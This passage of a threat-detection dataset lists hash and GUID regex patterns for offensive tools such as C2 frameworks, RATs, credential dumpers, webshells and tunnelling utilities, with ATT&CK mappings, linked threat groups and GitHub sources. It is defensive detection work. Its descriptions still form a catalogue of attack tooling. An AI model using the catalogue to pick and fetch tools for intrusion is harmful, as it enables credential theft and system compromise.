T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","21127" "*06B2AE2B-7FD3-4C36-B825-1594752B1D7B*",".{0,1000}06B2AE2B\-7FD3\-4C36\-B825\-1594752B1D7B.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#GUIDproject","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","21128" "*06B2B14A-CE87-41C0-A77A-2644FE3231C7*",".{0,1000}06B2B14A\-CE87\-41C0\-A77A\-2644FE3231C7.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","21129" "*06b7c041c6fb84a9b88ea99497787b0812e888e3591e71df3493180cfc1191fd*",".{0,1000}06b7c041c6fb84a9b88ea99497787b0812e888e3591e71df3493180cfc1191fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21131" 
"*06c177a58759cb2d8947e425086a1d945d252c411c649121c5ec1bb795452b34*",".{0,1000}06c177a58759cb2d8947e425086a1d945d252c411c649121c5ec1bb795452b34.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21134" "*06c66818ff2074772a93f1f6f40047ddfcb60928b03b89cc6d132db0450c9f62*",".{0,1000}06c66818ff2074772a93f1f6f40047ddfcb60928b03b89cc6d132db0450c9f62.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21135" "*06c71bc30e557ceab6964543bd0d68e1b9dfefa272b51a46f60171af621b5f42*",".{0,1000}06c71bc30e557ceab6964543bd0d68e1b9dfefa272b51a46f60171af621b5f42.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21137" "*06c7708610ab5a1cfda659fd349fd92315a4a58ed851466ce565e7866d77f375*",".{0,1000}06c7708610ab5a1cfda659fd349fd92315a4a58ed851466ce565e7866d77f375.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21138" 
"*06c92c9a18667e8d0d624f3de3dac6d3db96f3ce5f3e738a0c49ffa92d32c068*",".{0,1000}06c92c9a18667e8d0d624f3de3dac6d3db96f3ce5f3e738a0c49ffa92d32c068.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","21139" "*06e22309431bcbf87df30bb1b6e971b0edfe05f7f466f87e9c9982c3e4715bc5*",".{0,1000}06e22309431bcbf87df30bb1b6e971b0edfe05f7f466f87e9c9982c3e4715bc5.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","21145" "*06e7d0050e4aac352307c5b20372badd841e275bafc1dfe2ecbd0f2ad6366f81*",".{0,1000}06e7d0050e4aac352307c5b20372badd841e275bafc1dfe2ecbd0f2ad6366f81.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","21146" "*06e8a15602cc6001db8ac6d14c4cf938a92aab83a446bcd5c2c4334ad4b44e6e*",".{0,1000}06e8a15602cc6001db8ac6d14c4cf938a92aab83a446bcd5c2c4334ad4b44e6e.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of 
COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","21147" "*06e8f3cc9768b22015a52d96357a11185c43c239e887a1346e58eb8ab08c4471*",".{0,1000}06e8f3cc9768b22015a52d96357a11185c43c239e887a1346e58eb8ab08c4471.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21148" "*06f02a7b690087feea7f4e48b71e219c98de681cf3b1fdc3097f6264775dab62*",".{0,1000}06f02a7b690087feea7f4e48b71e219c98de681cf3b1fdc3097f6264775dab62.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","21149" "*06f14218e0f7b881a61c998824e6709b313b5c8baaa87a8d15986b0c5cf2b7cb*",".{0,1000}06f14218e0f7b881a61c998824e6709b313b5c8baaa87a8d15986b0c5cf2b7cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21150" 
"*06f43329147155af22520cda36202f9af0bd46b5e30b3d3f202d2a463aa2729d*",".{0,1000}06f43329147155af22520cda36202f9af0bd46b5e30b3d3f202d2a463aa2729d.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#filehash","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","21152" "*07019d2f4f6839056c0faf4f98e284f05c3f899f511d9766490c93d6a961fb71*",".{0,1000}07019d2f4f6839056c0faf4f98e284f05c3f899f511d9766490c93d6a961fb71.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","21153" "*0704e26e14a875b68311801b1009c8e9291df4709ff24e1f1aa877ac57b035e7*",".{0,1000}0704e26e14a875b68311801b1009c8e9291df4709ff24e1f1aa877ac57b035e7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21155" "*0705092d4c2a8e0475d1f686166b9b1ecb999c0133a0eaf8a7b8fd902dc64930*",".{0,1000}0705092d4c2a8e0475d1f686166b9b1ecb999c0133a0eaf8a7b8fd902dc64930.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21156" "*070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924*",".{0,1000}070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","21157" "*070f9bbe7bf3f68bca8bcc2b0baa1a6eadc0105e2e1766b06a0f5a912d12fcab*",".{0,1000}070f9bbe7bf3f68bca8bcc2b0baa1a6eadc0105e2e1766b06a0f5a912d12fcab.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","21158" "*071665786d0527bd94736db21ce49db2a113e1429d0413dbbdde0975506394e8*",".{0,1000}071665786d0527bd94736db21ce49db2a113e1429d0413dbbdde0975506394e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21159" "*07249ebf1045b25fce113f88373e816cd382d2147540ec274a1b1a0356004c7b*",".{0,1000}07249ebf1045b25fce113f88373e816cd382d2147540ec274a1b1a0356004c7b.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","21163" "*072b5eabc55e8df614786b965d9055fb1414059d28649da7258495f1f5b994d5*",".{0,1000}072b5eabc55e8df614786b965d9055fb1414059d28649da7258495f1f5b994d5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21165" "*07368a750023441d5e62634ca40ba8840a389a29ce56f0911a60271fcc55f521*",".{0,1000}07368a750023441d5e62634ca40ba8840a389a29ce56f0911a60271fcc55f521.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21168" "*07381878641e99bfa6ff286ba7010c04e9055e1dd7c27c079063617a18e1da03*",".{0,1000}07381878641e99bfa6ff286ba7010c04e9055e1dd7c27c079063617a18e1da03.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - 
T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21169" "*073a84685fb4031ef1d19df47b3e89714ab24bfed80ee48012ba300e4218ffc2*",".{0,1000}073a84685fb4031ef1d19df47b3e89714ab24bfed80ee48012ba300e4218ffc2.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21170" "*073f74ea0d5d2805e2255bdfc5cb697f5292c5b96ca55791187eaaa7ca6d3ca9*",".{0,1000}073f74ea0d5d2805e2255bdfc5cb697f5292c5b96ca55791187eaaa7ca6d3ca9.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21171" "*07400fb1198a8326fead8180f927e62e218885a4940b9879082d2adf49064ea5*",".{0,1000}07400fb1198a8326fead8180f927e62e218885a4940b9879082d2adf49064ea5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21173" "*074776f0f7421779a3b8c58553a25ccde6f81184b79feb913b679e3ac9e7ee06*",".{0,1000}074776f0f7421779a3b8c58553a25ccde6f81184b79feb913b679e3ac9e7ee06.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21174" "*0748293c2020daf803a3a57f1939a98fd25b074eff46b73028550f431f91ed32*",".{0,1000}0748293c2020daf803a3a57f1939a98fd25b074eff46b73028550f431f91ed32.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21176" "*074d726bf6cee59fe07d6f479b5f703fe423c17aca1bb047ce76459a24cf9916*",".{0,1000}074d726bf6cee59fe07d6f479b5f703fe423c17aca1bb047ce76459a24cf9916.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21178" "*0750514b25767d24d1a2923f95d3b88b5018b7b44476828f7c36a1d4003bddf0*",".{0,1000}0750514b25767d24d1a2923f95d3b88b5018b7b44476828f7c36a1d4003bddf0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21179" "*0756dc393b6d41fd03e69063d91342c43e60e4ce5fc63706bda46da0f8913657*",".{0,1000}0756dc393b6d41fd03e69063d91342c43e60e4ce5fc63706bda46da0f8913657.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21180" "*07628592-5A22-4C0A-9330-6C90BD7A94B6*",".{0,1000}07628592\-5A22\-4C0A\-9330\-6C90BD7A94B6.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","#GUIDproject","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","21183" "*076578d158003656371b54b02b8082e30afb48176e536517339b5034f46bd016*",".{0,1000}076578d158003656371b54b02b8082e30afb48176e536517339b5034f46bd016.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21184" "*076e2595f86d9c29af1d990f5a2447025fc836a26c0f5663e53b0d1399950644*",".{0,1000}076e2595f86d9c29af1d990f5a2447025fc836a26c0f5663e53b0d1399950644.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation 
tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#filehash","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","21187" "*076ecfd382b059466f47da6ec57866373451cb46b5fa1921874c23f094aa8912*",".{0,1000}076ecfd382b059466f47da6ec57866373451cb46b5fa1921874c23f094aa8912.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21188" "*0771a4c0fcbe55ce0e36aa1af50febcf4c2e96643a281a8de703a28f88536434*",".{0,1000}0771a4c0fcbe55ce0e36aa1af50febcf4c2e96643a281a8de703a28f88536434.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","21189" "*07767d1f2d939b8c1fcd6c4d2052069d711719f4e238c800fd500fac405df316*",".{0,1000}07767d1f2d939b8c1fcd6c4d2052069d711719f4e238c800fd500fac405df316.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21190" "*078682e4de2e678702911508629fc3e0f293628720e67506340155091ce06ac5*",".{0,1000}078682e4de2e678702911508629fc3e0f293628720e67506340155091ce06ac5.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from 
GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","21191" "*07878d4fc3ba5f9be83d693dceb90a590099ff908221e2935488d50aa70cffb4*",".{0,1000}07878d4fc3ba5f9be83d693dceb90a590099ff908221e2935488d50aa70cffb4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21192" "*0790530e1e0f1ed73b2b6fd701d75a2409c785af5367304d5fdd5bdfdf7eae46*",".{0,1000}0790530e1e0f1ed73b2b6fd701d75a2409c785af5367304d5fdd5bdfdf7eae46.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","21194" "*0796f9b079afb6b3a36ab11ae96bcad44364429fd9bceee074225736507bb14e*",".{0,1000}0796f9b079afb6b3a36ab11ae96bcad44364429fd9bceee074225736507bb14e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","21195" 
"*079bb8c94b5877751bc6015b2d82a8721d150a9849482eaa3b6332d252371f72*",".{0,1000}079bb8c94b5877751bc6015b2d82a8721d150a9849482eaa3b6332d252371f72.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21197" "*07a00b5f4f4d8fd3328b5454dc101d4e76126d9e2600ca2d6fd677452bf624d7*",".{0,1000}07a00b5f4f4d8fd3328b5454dc101d4e76126d9e2600ca2d6fd677452bf624d7.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","21198" "*07a00b5f4f4d8fd3328b5454dc101d4e76126d9e2600ca2d6fd677452bf624d7*",".{0,1000}07a00b5f4f4d8fd3328b5454dc101d4e76126d9e2600ca2d6fd677452bf624d7.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#filehash","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","21199" "*07a474dfcef198d7d5bf8261de06eed7c9528802e9065faf2a63c7ef6b992986*",".{0,1000}07a474dfcef198d7d5bf8261de06eed7c9528802e9065faf2a63c7ef6b992986.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD 
CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21201" "*07aa565057af859bc4956df913246b3b5fe39e86823666d6ba77aa98a697b02a*",".{0,1000}07aa565057af859bc4956df913246b3b5fe39e86823666d6ba77aa98a697b02a.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","21202" "*07bbfa80e6278158beec9685f17d0e305a03449433bd0485bcf492a57c480f80*",".{0,1000}07bbfa80e6278158beec9685f17d0e305a03449433bd0485bcf492a57c480f80.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","21205" "*07c90800861a9cb41dd71f0af41af0ce1b174fccf71bf88abc6d82f0208b2d78*",".{0,1000}07c90800861a9cb41dd71f0af41af0ce1b174fccf71bf88abc6d82f0208b2d78.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
